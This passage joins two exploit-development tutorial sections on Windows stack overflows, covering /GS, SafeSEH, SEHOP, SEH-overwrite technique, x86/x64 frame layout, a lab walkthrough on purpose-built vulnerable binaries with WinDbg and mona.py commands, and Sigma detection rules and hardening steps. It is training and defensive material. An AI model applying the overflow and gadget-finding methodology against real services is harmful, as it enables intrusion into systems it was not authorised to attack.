/GS (stack cookie) | Random DWORD cookie between locals and saved EBP/EIP; checked in epilogue | SEH overwrite before the cookie check; cookie leak
SafeSEH | PE table of valid SEH handlers; loader validates the handler before dispatch | Trampoline in a module not compiled /SAFESEH
SEHOP | Validates the SEH chain reaches FinalExceptionHandler at dispatch | Chain spoofing; non-opted-in modules
DEP/NX (/NXCOMPAT) | Pages are W^X; the stack is non-executable | ROP chain (follow-on topic)
ASLR (/DYNAMICBASE) | Randomizes image/stack/heap base | Partial overwrites, info leaks (follow-on topic)

/GS computes a program-wide master cookie at startup via __security_init_cookie(), stored in the module’s .data section. The prologue copies it onto the stack between the locals and the saved frame pointer; the epilogue runs __security_check_cookie(), which calls __report_gsfailure() on mismatch. Microsoft shipped /GS in Visual Studio 2003 and enabled it by default in 2005. Variable reordering moves arrays and structs to the highest part of the frame so a linear overflow cannot clobber other locals before reaching the cookie.

The original /GS only protected arrays of 8+ elements with element size 1 or 2; the later GS++ expanded coverage to any array and any struct regardless of size. The critical limitation: /GS does not protect exception handler records. DEP and ASLR are not stack-specific — they do not stop the overflow or the EIP hijack; they make running shellcode far harder.


Figure: Windows layers compiler-enforced mitigations (/GS, SafeSEH) with OS-level controls (SEHOP, DEP, ASLR); each targets a distinct stage of the exploit chain.

6. SEH-Based Overflow (x86)

On x86, Structured Exception Handling chains live on the stack as linked EXCEPTION_REGISTRATION_RECORD nodes:

typedef struct _EXCEPTION_REGISTRATION_RECORD {
    struct _EXCEPTION_REGISTRATION_RECORD *Next;   // next handler in chain
    PEXCEPTION_ROUTINE                     Handler; // SE handler function ptr
} EXCEPTION_REGISTRATION_RECORD, *PEXCEPTION_REGISTRATION_RECORD;

When a function uses __try/__except, this record sits on the stack beside the /GS cookie. If the attacker overflows far enough to overwrite both Next SEH and SE Handler, then triggers an exception before the epilogue runs __security_check_cookie(), the OS dispatches to the attacker-controlled handler and the cookie check never runs.

The standard technique overwrites SE Handler with the address of a POP–POP–RET gadget inside a loaded module. At dispatch, the stack arrangement places a pointer to the Next SEH field where RET lands; POP–POP–RET unwinds two slots and returns into the attacker’s Next SEH value, which is typically a short jump (EB 06) over the handler bytes into the shellcode.

SafeSEH breaks this by validating the handler against the PE’s registered-handler table; attackers respond by sourcing the gadget from a module not built with /SAFESEH. SEHOP (introduced with Vista SP1 and Server 2008; enabled by default on the server editions and opt-in on the Vista and Windows 7 clients) walks the chain to confirm it terminates at FinalExceptionHandler, defeating a naively overwritten chain. On 64-bit, exception data is table-based and no longer stored on the stack, so this primitive does not apply.
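
The chain-termination idea behind SEHOP can be illustrated with a small model. This is a conceptual sketch only: the real check also validates details such as stack bounds and record alignment, and every address below is invented. The records dictionary maps a record address to its (Next, Handler) pair.

```python
END_OF_CHAIN = 0xFFFFFFFF


def chain_is_valid(records: dict, head: int, final_handler: int,
                   max_depth: int = 64) -> bool:
    """Walk Next pointers from head; valid only if the last record is the final handler."""
    addr, seen = head, set()
    for _ in range(max_depth):
        if addr in seen or addr not in records:
            return False                      # loop, or pointer to a non-record
        seen.add(addr)
        next_addr, handler = records[addr]
        if next_addr == END_OF_CHAIN:
            return handler == final_handler
        addr = next_addr
    return False


FINAL = 0x77001000                            # hypothetical final handler address
intact = {
    0x0019FF60: (0x0019FFCC, 0x00401000),
    0x0019FFCC: (END_OF_CHAIN, FINAL),
}
# After an overflow, Next holds jump bytes instead of a valid record address.
corrupted = {0x0019FF60: (0x909006EB, 0x625010B4)}

print(chain_is_valid(intact, 0x0019FF60, FINAL))      # True
print(chain_is_valid(corrupted, 0x0019FF60, FINAL))   # False
```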


Figure: The SEH-based stack overflow attack chain, from buffer overflow through exception dispatch, POP–POP–RET gadget, and short jump into shellcode. Overwriting the SEH record and triggering an exception before the /GS epilogue runs lets attackers bypass the stack cookie entirely.

7. Lab Walkthrough: Exploiting an Intentionally Vulnerable Binary

Perform every step against a purpose-built target — VulnServer, brainpan, or a custom binary compiled with /GS- — inside an isolated VM with no network access to production. The two-phase approach makes the mitigations tangible:

  1. No-protections build: Compile with /GS- /NXCOMPAT:NO /DYNAMICBASE:NO. Run the fuzzer (§4), crash the service, find the offset with a cyclic pattern, confirm EIP control, enumerate bad chars, locate JMP ESP with mona.py, and land in a NOP sled.
  2. /GS-only build: Recompile with /GS enabled, replay the same payload, and watch __security_check_cookie detect the corrupted canary and terminate the process via __report_gsfailure() — the same input that worked now dies in the epilogue.

Reference debugger and mona.py commands:

0:000> g                      ; run until crash
0:000> r                      ; read registers — expect EIP = 41414141
0:000> d esp                  ; dump stack at ESP — find your buffer
0:000> !exploitable           ; triage the crash classification
0:000> bp 0x625011AF          ; break on the JMP ESP trampoline
!mona findmsp                          ; locate cyclic pattern, report EIP offset
!mona jmp -r esp -cpb "\x00\x0a\x0d"   ; find JMP ESP excluding bad chars
!mona bytearray -cpb "\x00"            ; generate byte array for badchar diffing

8. Common Attacker Techniques

Technique | Description
Linear stack smash | Overflow a buffer to overwrite saved EIP with a JMP ESP trampoline
SEH overwrite | Overwrite Next SEH + SE Handler, trigger an exception to bypass /GS
Non-SafeSEH trampoline | Source POP–POP–RET / JMP ESP gadgets from modules lacking /SAFESEH
Bad-char-safe encoding | Encode shellcode to avoid protocol-mangled bytes (\x00, \x0a, \x0d)
Egghunter / staging | Use a small first-stage to locate or download a larger payload
Post-exploit VirtualProtect | Mark injected memory executable to evade software DEP in legacy scenarios

In practice the attacker chains these: a SEH overwrite defeats the cookie, a non-SafeSEH gadget defeats SafeSEH, and a ROP stub built from non-ASLR module gadgets defeats DEP before transferring to shellcode.


9. Defensive Strategies & Detection

Sysmon does not emit a “buffer overflow” event. The crash surfaces through Windows Error Reporting, and the post-exploitation behavior surfaces through Sysmon.

  • WER Event ID 1000 (Application Error, Application log) — logs the faulting module, ExceptionCode = 0xC0000005 (access violation), faulting offset, and thread ID. A 0xC0000005 at a non-canonical offset in a network-facing service is high-fidelity.
  • WER Event ID 1001 — records the crash bucket and any captured dump.

Relevant Sysmon events for follow-on activity:

Event ID | Name | Relevance
1 | Process Creation | Shells/payloads spawned from a crashed service
3 | Network Connection | Reverse-shell / C2 egress from shellcode
7 | Image Loaded | Unexpected ws2_32.dll load by a non-network service
8 | CreateRemoteThread | Thread injection by shellcode
10 | Process Access | Shellcode calling OpenProcess on lsass.exe
11 | File Created | Dropped payloads / second-stage binaries
25 | Process Tampering | Process hollowing following the overflow

Useful ETW providers: Microsoft-Windows-WER-Diag (crash diagnostics), Microsoft-Windows-Security-Mitigations (WDEG/Exploit Guard triggers, in /KernelMode and /UserMode channels), and Microsoft-Windows-Kernel-Process. Enable Audit Process Creation (4688) with command-line logging and Audit Process Termination (4689) to catch crash/restart loops.

A conceptual Sigma rule keying on repeated crashes of a network-facing service:

title: Repeated Application Crash on Network-Facing Service
logsource:
  product: windows
  service: application
detection:
  selection:
    EventID: 1000
    Application|contains: 'vulnservice.exe'
    ExceptionCode: '0xc0000005'
  timeframe: 1m
  condition: selection | count() by Application > 3
falsepositives:
  - Legitimate software bugs
level: medium
tags:
  - attack.initial_access
  - attack.t1190
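
The thresholding the rule describes (more than three crashes of one application inside a minute) can be prototyped as a sliding window over exported events. A minimal sketch, assuming events arrive in time order as (timestamp in seconds, application name) pairs; the function name and sample data are hypothetical.

```python
from collections import defaultdict, deque


def crash_bursts(events, threshold: int = 3, window: float = 60.0) -> set:
    """Return applications with more than `threshold` crashes inside `window` seconds."""
    recent = defaultdict(deque)
    flagged = set()
    for ts, app in events:
        queue = recent[app]
        queue.append(ts)
        while queue and ts - queue[0] > window:
            queue.popleft()                   # drop crashes that aged out
        if len(queue) > threshold:
            flagged.add(app)
    return flagged


events = [
    (0, "vulnservice.exe"), (10, "vulnservice.exe"),
    (20, "vulnservice.exe"), (30, "vulnservice.exe"),
    (500, "other.exe"),
]
print(crash_bursts(events))   # {'vulnservice.exe'}
```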

Hardening Steps

  1. Force WDEG / Exploit Protection on network-facing services — mandatory DEP, force-ASLR, SEHOP, heap-spray protection via Set-ProcessMitigation.
  2. Build with /GS, /SAFESEH, /DYNAMICBASE, /NXCOMPAT and audit your pipeline for them.
  3. Verify SEHOP: HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\kernel\DisableExceptionChainValidation = 0.
  4. Forward WER Event ID 1000 to the SIEM and alert on repeated crashes of one process.
  5. Use AddressSanitizer (/fsanitize=address, MSVC ≥ VS 2019 16.9) in dev/test to catch OOB writes.
  6. Rate-limit oversized inputs at the WAF/NGFW; alert on crash surges.
  7. Run services least-privilege so successful exploitation yields minimal access.

10. Tools for Stack Overflow Analysis

Tool | Description | Link
WinDbg | Kernel/user debugger; !exploitable crash triage | microsoft.com
x64dbg | User-mode debugger for live frame inspection | x64dbg.com
mona.py | Immunity/WinDbg plugin for offsets, trampolines, bad chars | github.com
pwntools | Python exploit-dev framework (cyclic, p32) | pwntools.com
ROPgadget | Gadget discovery for DEP-bypass chains | github.com
Ghidra | Static disassembly / decompilation for code review | ghidra-sre.org
Sysmon | Endpoint telemetry for post-exploitation behavior | microsoft.com

11. MITRE ATT&CK Mapping

Technique | MITRE ID | Detection
Exploit Public-Facing Application | T1190 | WER EventID 1000 crash bursts; WAF oversized-input alerts
Exploitation for Privilege Escalation | T1068 | Service running as SYSTEM crashing then spawning children
Exploitation for Client Execution | T1203 | Client app (parser/player) crash + child process via Sysmon EventID 1
Endpoint DoS: Application Exploitation | T1499.004 | Repeated crash/restart loops (4689, WER 1000)
Exploit Protection (mitigation) | M1050 | DEP, ASLR, SEHOP, /GS enforced via WDEG telemetry

Stack buffer overflow is a vulnerability primitive, not a standalone ATT&CK technique. T1190 and T1068 are the canonical mappings for the adversarial behavior that uses it.


Summary

  • A classic stack buffer overflow overwrites the saved return address to hijack EIP and pivot execution into attacker-controlled shellcode via a JMP ESP trampoline.
  • The x86 frame places locals, an optional /GS cookie, saved EBP, and the return EIP in a predictable order that linear overwrites exploit.
  • /GS inserts a stack canary checked in the epilogue, but does not protect SEH records — the SEH overwrite is the canonical x86 bypass, in turn countered by SafeSEH and SEHOP.
  • DEP and ASLR do not stop the overflow itself; they force ROP and info-leak techniques to run shellcode.
  • Detect via WER Event ID 1000 (0xC0000005) crash bursts plus Sysmon post-exploitation events, and harden with WDEG, /GS /SAFESEH /DYNAMICBASE /NXCOMPAT, SEHOP, and least privilege.

Understanding the Stack: Frames, Prologue/Epilogue, and Stack Layout

Objective: Understand how the call stack is organized in x86 and x64 Windows processes — the mechanics of stack frames, function prologue/epilogue sequences, calling conventions, shadow space, and the exact memory layout a debugger reveals — so you can recognize a healthy stack versus a corrupted one and reason precisely about stack-based exploitation and its defenses.


1. Why the Stack Matters for Exploit Development

The stack is the primary battleground for classic memory-safety bugs. Saved return addresses, saved frame pointers, function arguments, and fixed-size local buffers all live side by side on the same contiguous, downward-growing region. When a write runs past the end of a stack buffer, it corrupts the very control-flow data the CPU will trust on the next RET.

For a defender, the same knowledge is diagnostic. A return address pointing into the stack or heap instead of an executable image, an RSP value that jumped thousands of bytes (a stack pivot), or a frame chain that no longer links cleanly are all signatures of corruption. You cannot recognize an abnormal stack until you have internalized a normal one.


2. The Stack as a Data Structure: Growth Direction and Address Space Layout

A Windows process virtual address space holds the mapped image (.text, .data), loaded DLLs, the heap, thread stacks, and per-thread/per-process control structures (TEB/PEB). Each thread receives its own stack, reserved and committed on demand.

The stack grows downward — toward lower addresses. PUSH decrements the stack pointer; POP increments it. The live top of the stack is always tracked by RSP (x64) / ESP (x86).

Register | Role
RSP / ESP | Stack pointer: always points to the top (lowest address) of the current frame
RBP / EBP | Base/frame pointer: anchors the frame in x86; in x64 not used for locals/args unless alloca() is used
RIP / EIP | Instruction pointer: saved as the return address by CALL
RAX | Integer/pointer return value (XMM0 for floating-point)

3. x86 Stack Frames: Registers, Calling Conventions, and the EBP Chain

32-bit Windows supports several co-existing calling conventions, which is why x86 reversing requires you to identify the convention before reading arguments.

Convention | Cleanup | Argument Passing
__cdecl | Caller cleans | Right-to-left on stack
__stdcall | Callee cleans | Right-to-left on stack (Win32 API)
__fastcall | Callee cleans | First two in ECX/EDX, rest on stack
__thiscall | Callee cleans | C++ this in ECX, args on stack

x86 code conventionally uses EBP as a fixed frame anchor. Every local and argument is addressed relative to it, and each saved EBP points at the caller’s saved EBP, forming a walkable frame chain.

// MSVC x86, compiled /Od (no optimization)
void vuln(char *src) {
    char buf[64];      // local buffer — classic overflow target
    strcpy(buf, src);  // bounded only by src
}

; x86 prologue for vuln(), then the frame layout from high → low address
push ebp            ; save caller's EBP
mov  ebp, esp       ; EBP anchors this frame
sub  esp, 64        ; allocate buf[64]
; ... strcpy ...
; [EBP + 8]  -> arg1 (src)
; [EBP + 4]  -> return address   ← ret-overwrite target
; [EBP + 0]  -> saved EBP        ← frame chain link
; [EBP - 64] -> buf              ← overflow origin

A buffer overflow that walks upward from [EBP-64] crosses the saved EBP, then the return address — the two values the epilogue and RET consume.
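
The order in which a linear write reaches each slot can be checked with a little arithmetic. The following is a minimal sketch, assuming the exact layout shown above (a 64-byte buffer directly below saved EBP, no /GS cookie, no padding); the helper name overwritten_slots is hypothetical, and write_len counts every byte written, including the terminating NUL that strcpy appends.

```python
def overwritten_slots(write_len, buf_size=64, word=4):
    """List the x86 frame slots touched by a linear write of `write_len`
    bytes that starts at buf ([EBP - buf_size]).
    Assumes no canary and no alignment padding between the slots."""
    slots = [
        ("buf", buf_size),          # [EBP-64 .. EBP-1]
        ("saved EBP", word),        # [EBP+0]
        ("return address", word),   # [EBP+4]
        ("arg1 (src)", word),       # [EBP+8]
    ]
    touched, offset = [], 0
    for name, size in slots:
        if write_len > offset:      # at least one byte lands in this slot
            touched.append(name)
        offset += size
    return touched

for n in (64, 65, 69, 73):
    print(n, overwritten_slots(n))
```

A write of exactly 64 bytes stays inside the buffer; the 65th byte is the first to damage saved EBP, and the 69th is the first to reach the return address.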


Figure: a typical x86 stack frame. Overflowing the buffer at [EBP-N] walks upward through locals, corrupting saved EBP and then the return address.

4. x64 Stack Frames: The Windows ABI and Shadow Space

The Windows x64 ABI consolidates every x86 convention into a single calling convention. The first four integer or pointer parameters pass in RCX, RDX, R8, R9; the first four floating-point parameters in XMM0–XMM3. Additional arguments spill onto the stack.

Two rules dominate the x64 layout:

  • Shadow space (home space): The caller allocates 32 bytes immediately above the return address, regardless of how many parameters are actually used. The callee may dump RCX/RDX/R8/R9 into this home space if it needs to spill them.
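  • 16-byte alignment: RSP must be 16-byte aligned at the point of a CALL. Because CALL pushes an 8-byte return address, RSP is a multiple of 16 just before the call and 8 bytes short of one on entry to the callee, which is why prologues typically subtract a value such as 0x28 to restore alignment.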

Critically, x64 functions typically address locals and arguments RSP-relative, leaving RSP constant for the body of the function. RBP is freed for general use unless alloca() is present.
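
The alignment rule is easiest to trust after working the numbers. The sketch below is illustrative only: it assumes a prologue that pushes no registers and allocates everything with a single sub rsp, N, and the helper names rsp_at_entry and frame_size are hypothetical.

```python
def rsp_at_entry(rsp_before_call):
    """RSP as seen by the callee's first instruction."""
    if rsp_before_call % 16:
        raise ValueError("RSP must be 16-byte aligned at the CALL")
    return rsp_before_call - 8          # CALL pushed the 8-byte return address

def frame_size(local_bytes, shadow=0x20):
    """Smallest `sub rsp, N` that covers the locals plus shadow space for
    this function's own callees and leaves RSP 16-byte aligned again.
    Assumes the prologue pushes no registers."""
    n = (local_bytes + shadow + 7) & ~7   # round up to a multiple of 8
    if n % 16 != 8:                       # entry RSP is 8 mod 16, so N must be too
        n += 8
    return n

entry = rsp_at_entry(0x7FFE0000)          # hypothetical aligned RSP in the caller
n = frame_size(0)
print(hex(n), (entry - n) % 16)
```

With no locals the result is 0x28: 0x20 bytes of shadow space plus 8 bytes of padding that undo the misalignment introduced by the pushed return address.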

[High address — caller's frame]
  Stack arg 5+      ← [RSP + 0x28+]
  Shadow [R9]       ← [RSP + 0x20]
  Shadow [R8]       ← [RSP + 0x18]
  Shadow [RDX]      ← [RSP + 0x10]
  Shadow [RCX]      ← [RSP + 0x08]   (relative to callee entry)
  Return Address    ← [RSP + 0x00]   ← ret-overwrite target
  Local variables   ← [RSP - N]
[Low address — grows downward]

Figure: The x64 Windows ABI reserves 32 bytes of shadow space above the return address; RSP remains constant through the function body for RSP-relative addressing.

5. Volatile vs. Non-Volatile Registers and Leaf Functions

The x64 convention splits the register file into volatile (caller-saved) and non-volatile (callee-saved). A function that clobbers a non-volatile register must save and restore it in its prologue/epilogue.

Class | Registers
Volatile (caller-saved) | RAX, RCX, RDX, R8–R11, XMM0–XMM5
Non-volatile (callee-saved) | RBX, RBP, RDI, RSI, R12–R15, XMM6–XMM15

A leaf function changes no non-volatile register (including not altering RSP by calling out). A non-leaf function calls another function — which adjusts RSP — and therefore must establish a frame and register unwind data. This distinction drives whether the compiler emits a prologue and .pdata entry at all.
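
The save/restore obligation can be expressed as a set intersection. This is a minimal sketch under the register classes listed above; the names NON_VOLATILE, must_preserve, and is_leaf are hypothetical helpers, and the leaf test is a simplification of the ABI definition.

```python
# Non-volatile (callee-saved) registers of the Windows x64 convention
NON_VOLATILE = {"RBX", "RBP", "RDI", "RSI", "R12", "R13", "R14", "R15"} \
    | {f"XMM{i}" for i in range(6, 16)}

def must_preserve(clobbered):
    """Registers the prologue/epilogue has to save and restore."""
    return sorted({r.upper() for r in clobbered} & NON_VOLATILE)

def is_leaf(clobbered, makes_calls=False, allocates_stack=False):
    """Simplified leaf test: no calls, no stack allocation, and no
    non-volatile register modified."""
    return not makes_calls and not allocates_stack and not must_preserve(clobbered)

print(must_preserve(["rax", "rbx", "r12", "xmm7"]))
print(is_leaf(["rax", "rcx", "r10"]))
```

A function that only touches RAX, RCX, and R10 qualifies as a leaf here; clobbering RBX or R12 forces a prologue.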


6. Prologue and Epilogue Deep Dive

The prologue establishes the frame: save callee-saved registers and reserve local space. The epilogue reverses it and returns.

; x86 epilogue
mov  esp, ebp      ; free locals
pop  ebp           ; restore caller's EBP
ret                ; pop return address → EIP

LEAVE is a single instruction equivalent to mov esp, ebp + pop ebp, available on both x86 and x64.

; x64 MASM (ml64) non-leaf frame
sub  rsp, 0x28     ; 0x20 shadow + 8 align pad
; ... body uses [rsp+0x..] for locals/spills ...
add  rsp, 0x28     ; deallocate
ret                ; pop return address → RIP

Many optimized x64 functions omit push rbp entirely and address everything from RSP. Frame Pointer Omission (FPO) saves two instructions and frees RBP as a general register; GCC/Clang do this by default at -O2, and MSVC does similarly with /O2. For exploitation this matters: without a frame pointer there is no [EBP+4] anchor for the return address — offsets must be computed from RSP at a known instruction.

__declspec(noinline) int callee(int a, int b, int c, int d) {
    int local = a + b + c + d;   // forces a real frame + homing
    return local;
}
int caller(void) { return callee(1, 2, 3, 4); }

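Compile this with optimizations disabled (/Od) on Godbolt, or step it in WinDbg, to watch RCX/RDX/R8/R9 home into shadow space. Optimized builds usually keep the arguments in registers and may fold the call away entirely.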


7. Unwind Data and Structured Exception Handling

x64 Windows requires every non-leaf function to register unwind data in the PE .pdata and .xdata sections so the OS can walk frames during structured exception handling. Each function publishes a RUNTIME_FUNCTION and an associated UNWIND_INFO that describes the prologue.

typedef struct _RUNTIME_FUNCTION {
    ULONG BeginAddress;
    ULONG EndAddress;
    ULONG UnwindData;   // RVA to UNWIND_INFO
} RUNTIME_FUNCTION, *PRUNTIME_FUNCTION;

RtlVirtualUnwind() consumes this data to reconstruct caller frames without a frame pointer. For defenders, intact, parseable unwind data is what lets EDR and crash tooling produce a reliable call stack; ROP chains and stack pivots frequently produce stacks that fail to unwind cleanly — itself a detectable anomaly.
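
To make the table format concrete, the sketch below decodes a .pdata blob with Python's struct module and looks up the entry covering a given RVA. It is a simplified illustration: the sample bytes are fabricated for the example, the helper names parse_pdata and lookup are hypothetical, and real tooling would read the section from the PE exception directory.

```python
import struct
from bisect import bisect_right

# Three little-endian 32-bit RVAs: BeginAddress, EndAddress, UnwindData
ENTRY = struct.Struct("<III")

def parse_pdata(raw):
    """Decode a .pdata blob into a list of (begin, end, unwind) tuples."""
    usable = len(raw) - len(raw) % ENTRY.size
    return [ENTRY.unpack_from(raw, off) for off in range(0, usable, ENTRY.size)]

def lookup(entries, rva):
    """Find the entry covering `rva`; entries are sorted by BeginAddress."""
    i = bisect_right([e[0] for e in entries], rva) - 1
    if i >= 0 and entries[i][0] <= rva < entries[i][1]:
        return entries[i]
    return None   # leaf function, or an address with no unwind data

# Fabricated two-function table for illustration
blob = ENTRY.pack(0x1000, 0x1040, 0x3000) + ENTRY.pack(0x1040, 0x10A0, 0x300C)
table = parse_pdata(blob)
print(lookup(table, 0x1050))
print(lookup(table, 0x2000))
```

An instruction pointer that maps to no entry is either inside a leaf function or outside image code altogether, which is the condition an unwinder has to handle when a stack has been pivoted.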


8. Reading Stack Frames in a Debugger

In WinDbg or x64dbg you read the live frame directly off RSP.

bp mymodule!vuln        ; $$ break at the function
g                       ; $$ run to it
dps rsp L10             ; $$ dump 0x10 (16) pointer-sized stack slots
r rsp, rbp, rip         ; $$ show live pointers
k                       ; $$ walk the call stack (uses unwind data)

dps rsp L10 prints the raw stack. At function entry the saved return address sits at [RSP]; after a prologue that subtracts N from RSP it sits at [RSP+N]. The k command resolves it to module!function+offset. A return address that resolves to no module, or to the stack itself, is the first sign of a hijacked frame.
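
The "does this return address resolve to a module" check is simple enough to script against a module list. The following is a hedged sketch: the module bases, sizes, and stack range are made-up sample values, and classify_return_address is a hypothetical helper rather than a debugger API.

```python
def classify_return_address(addr, modules, stack_range):
    """Label a saved return address the way a triage script might.
    modules: list of (name, base, size); stack_range: (low, high) bounds
    of the thread stack. All inputs here are hypothetical sample data."""
    low, high = stack_range
    if low <= addr < high:
        return "stack"                      # returning into the stack itself
    for name, base, size in modules:
        if base <= addr < base + size:
            return f"{name}+0x{addr - base:x}"
    return "unbacked"                       # no loaded image covers it

modules = [("mymodule", 0x7FF6_0000_0000, 0x20000),
           ("ntdll", 0x7FFB_1000_0000, 0x1F0000)]
stack = (0x00A0_0000_0000, 0x00A0_0010_0000)

for addr in (0x7FF6_0000_1234, 0x00A0_0000_0100, 0x4141_4141_4141_4141):
    print(hex(addr), classify_return_address(addr, modules, stack))
```

Only the first address would be considered healthy; the other two correspond to the "stack itself" and "no module" cases described above.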


9. How Stack Overflows Corrupt Frame Integrity

Overflowing a fixed local buffer writes past its bounds toward higher addresses, in the direction of the saved frame pointer and the return address.

# Conceptual layout arithmetic — NOT a payload.
# 64-byte buffer sitting below the saved return address.

buf_size      = 64
saved_rbp     = 8          # x86: 4
ret_addr_slot = 8          # x86: 4
offset_to_ret = buf_size + saved_rbp   # bytes before reaching the return slot

print(f"bytes before saved frame ptr: {buf_size}")
print(f"bytes before return address : {offset_to_ret}")

When execution reaches RET, the CPU pops whatever now sits in the return slot into RIP/EIP and jumps there. A controlled overwrite places a valid, attacker-chosen address (a gadget or function); an uncontrolled overwrite leaves garbage, producing an immediate access violation. The distinction matters operationally: uncontrolled corruption crashes loudly (WER dump), while a precise overwrite can transfer control silently — which is exactly why the compiler inserts a guard between the buffer and the return address.


Figure: A stack overflow progresses deterministically from the buffer edge through the GS cookie and saved frame pointer to the return address, hijacking control at the next RET.

10. Modern Mitigations and What They Change About the Layout

Mitigations alter the frame layout or the trust placed in it; none remove the need to understand the stack.

// /GS inserts a cookie between locals and the saved frame data.
void vuln(char *src) {
    char buf[64];
    // prologue: mov rax, __security_cookie; xor rax, rsp; mov [rsp+0x..], rax
    strcpy(buf, src);
    // epilogue: mov rcx, [rsp+0x..]; xor rcx, rsp; call __security_check_cookie
}

Mitigation | Structural Effect
/GS stack cookie | __security_cookie placed between locals and saved return address; mismatch → __report_gsfailure
DEP / NX | IMAGE_DLLCHARACTERISTICS_NX_COMPAT; stack pages non-executable, blocking on-stack shellcode
ASLR | IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE; randomizes stack/image base, breaking hardcoded addresses
Control Flow Guard | IMAGE_GUARD_CF_INSTRUMENTED; validates indirect call targets
Intel CET Shadow Stack | CETCOMPAT mitigation; read-only shadow copy of return addresses defeats classic ret-overwrites
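
The /GS check described in the code comments above reduces to two XOR operations. The sketch below models it with plain integers; the cookie and RSP values are arbitrary stand-ins, the function names are hypothetical, and the real __security_check_cookie is a compiler runtime routine rather than anything callable from Python.

```python
MASK64 = (1 << 64) - 1

def gs_prologue(security_cookie, rsp):
    """Value the prologue stores in the frame: cookie XOR RSP."""
    return (security_cookie ^ rsp) & MASK64

def gs_epilogue_ok(stored, security_cookie, rsp):
    """Epilogue check: undo the XOR and compare with the global cookie."""
    return ((stored ^ rsp) & MASK64) == security_cookie

cookie = 0x0000_5A17_C0DE_9B3F      # arbitrary stand-in for __security_cookie
rsp = 0x0000_00A0_0000_F8C0         # hypothetical frame address

slot = gs_prologue(cookie, rsp)
print(gs_epilogue_ok(slot, cookie, rsp))                  # intact frame
print(gs_epilogue_ok(0x4141414141414141, cookie, rsp))    # slot overwritten
```

Mixing RSP into the stored value means the same cookie yields a different in-frame value for every frame, so a value leaked from one frame is not directly reusable in another.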

11. Common Attacker Techniques

Technique | Description
Saved return-address overwrite | Overflow a local buffer to replace the return slot ([RBP+8] in a framed x64 function, [EBP+4] on x86) and redirect RET
Saved frame pointer overwrite | Corrupt saved RBP/EBP to desynchronize the frame chain or pivot
Stack pivot | Use a gadget (e.g. xchg rax, rsp ; ret or leave ; ret) to point RSP at attacker data
ROP chaining | Defeat DEP by chaining ret-terminated gadgets via the corrupted stack
SEH overwrite (x86) | Corrupt the exception handler chain on the stack to gain control on fault
Off-by-one / frame-pointer overwrite | Single-byte overflow to truncate or shift EBP, shifting subsequent frame math

These primitives all depend on knowing the exact offset from a controllable buffer to the saved control-flow data — which is precisely the layout this tutorial defines.


12. Defensive Strategies & Detection

Detection focuses on the crash artifacts and post-exploitation behavior that stack corruption produces, since the corruption itself is often only visible at the moment of RET.

SignalDetail
Windows Error ReportingAccess violation at abnormal RIP; dumps under %LOCALAPPDATA%\Microsoft\Windows\WER\ReportQueue; Application Event 1000/1001
Sysmon Event ID 1Unusual child process from document/browser renderers (T1203 follow-on)
Sysmon Event ID 10Cross-process stack reads via ReadProcessMemory
Security Event 4672Special privileges to an unexpected logon (T1068 follow-on)
ETW Microsoft-Windows-Kernel-ProcessAnomalous RIP/RSP deltas via call-stack sampling (stack pivot)
ETW Microsoft-Windows-Security-MitigationsEmits events when CFG, DEP, or Shadow Stack violations are blocked

A practical first-line Sigma sketch catches the most common post-exploitation chain — a renderer spawning a shell:

title: Suspicious Child Process From Document Renderer
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 1
    ParentImage|endswith:
      - '\WINWORD.EXE'
      - '\EXCEL.EXE'
      - '\AcroRd32.exe'
    Image|endswith:
      - '\cmd.exe'
      - '\powershell.exe'
      - '\wscript.exe'
  condition: selection
level: high
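
The matching logic of this rule can be prototyped against exported events before it is deployed. The sketch below is an approximation under stated assumptions: events are plain dictionaries using Sysmon field names, matching is case-insensitive as in Sigma's default string handling, and is_suspicious is a hypothetical helper, not a Sigma backend.

```python
# Lower-cased suffixes taken from the rule above
PARENTS = ("\\winword.exe", "\\excel.exe", "\\acrord32.exe")
CHILDREN = ("\\cmd.exe", "\\powershell.exe", "\\wscript.exe")

def is_suspicious(event):
    """True when a Sysmon process-creation event matches both the parent
    and the child image lists."""
    if event.get("EventID") != 1:
        return False
    parent = event.get("ParentImage", "").lower()
    image = event.get("Image", "").lower()
    return parent.endswith(PARENTS) and image.endswith(CHILDREN)

hit = {"EventID": 1,
       "ParentImage": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
       "Image": r"C:\Windows\System32\cmd.exe"}
miss = {"EventID": 1,
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\cmd.exe"}
print(is_suspicious(hit), is_suspicious(miss))
```

Both lists must match, mirroring how the fields inside a single Sigma selection are ANDed while the values within each list are ORed.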

Hardening checklist: compile with /GS (verify no /GS-), link /NXCOMPAT and /DYNAMICBASE, enable CFG with /guard:cf, turn on CET via SetProcessMitigationPolicy(ProcessUserShadowStackPolicy, ...), enforce /SAFESEH on x86, and configure Windows Defender Exploit Guard for legacy binaries. MITRE mitigation M1050 (Exploit Protection) bundles these OS controls.


13. MITRE ATT&CK Mapping

Stack layout knowledge is foundational rather than a single technique; the mapping below frames it in the defensive direction — recognizing the artifacts each technique produces.

Technique | MITRE ID | Detection
Exploitation for Client Execution | T1203 | Sysmon EventID 1 renderer child chains; WER crash dumps
Exploitation for Privilege Escalation | T1068 | Security EventID 4672 unexpected source process
Exploit Public-Facing Application | T1190 | Service crash loops + WER on network-facing daemons
Reflective Code Loading | T1620 | ETW call-stack anomalies; non-image-backed RIP
Process Injection | T1055 | Sysmon EventID 8/10; abnormal cross-process access

14. Tools for Stack Analysis

Tool | Description | Link
WinDbg | Kernel/user debugging, k, dps, unwind walking | microsoft.com
x64dbg | Live user-mode stack inspection on x64/x86 | x64dbg.com
Godbolt Compiler Explorer | View prologue/epilogue and FPO across compilers | godbolt.org
Ghidra | Static reconstruction of frames and calling conventions | ghidra-sre.org
Process Hacker | Live thread stacks and call-stack walking | processhacker.sourceforge.io
NASM | Assemble illustrative prologue/epilogue snippets | nasm.us
GDB + pwndbg | Cross-platform frame and offset analysis | gdb.gnu.org

Summary

  • The stack is a downward-growing region where buffers sit beside the very return address the CPU trusts at RET — which is why it is the primary target of memory-safety exploits.
  • x86 frames anchor on EBP with multiple calling conventions; x64 uses one convention, RCX/RDX/R8/R9 parameters, 32-byte shadow space, 16-byte alignment, and RSP-relative addressing.
  • The prologue saves non-volatile registers and reserves locals; the epilogue (LEAVE/RET) reverses it; frame-pointer omission removes the [EBP+4] anchor and forces RSP-relative offset math.
